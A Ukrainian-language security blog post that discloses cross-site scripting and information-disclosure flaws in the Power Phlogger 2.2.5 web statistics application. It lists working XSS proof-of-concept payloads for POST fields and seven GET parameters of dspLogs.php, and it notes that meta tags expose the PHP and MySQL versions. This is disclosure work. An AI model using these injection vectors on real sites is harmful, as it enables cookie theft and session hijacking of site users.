Уразливості в Power Phlogger

23:52 10.02.2008

Ще 18.08.2006 я виявив Cross-Site Scripting уразливості в Power Phlogger, котрий використовує одна українська компанія як основу для власного рахівника. Про що їм у вересні 2006 повідомив і вони виправили уразливості. Хоча і дуже нечемно забули подякувати мені за мою роботу по підвищенню безпеки їх сайтів - не подякували за жоден з моїх листів про численні уразливості на їхніх сайтах (як на сайті з Power Phlogger, так й інших).

XSS:

POST запит на сторінці http://site/dspLogs.php:

"><script>alert(document.cookie)</script>В полях: Host, Referrer, Agent Information, res, colo, online, mp.

Як я перевірив учора, 09.02.2008, дані уразливості були виправлені лише частково - лише в POST запиті, а в GET XSS залишилися. Також окрім Cross-Site Scripting, я виявив Information disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS:

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На сторінці http://site/index.php (як й інших сторінках додатку) виводиться важлива інформація про систему (версії PHP та MySQL, як і версія веб сервера з його банера) в мета-тегах. Що приводить до витоку важливої інформації.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це перша частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.


Leave a Reply

You must be logged in to post a comment.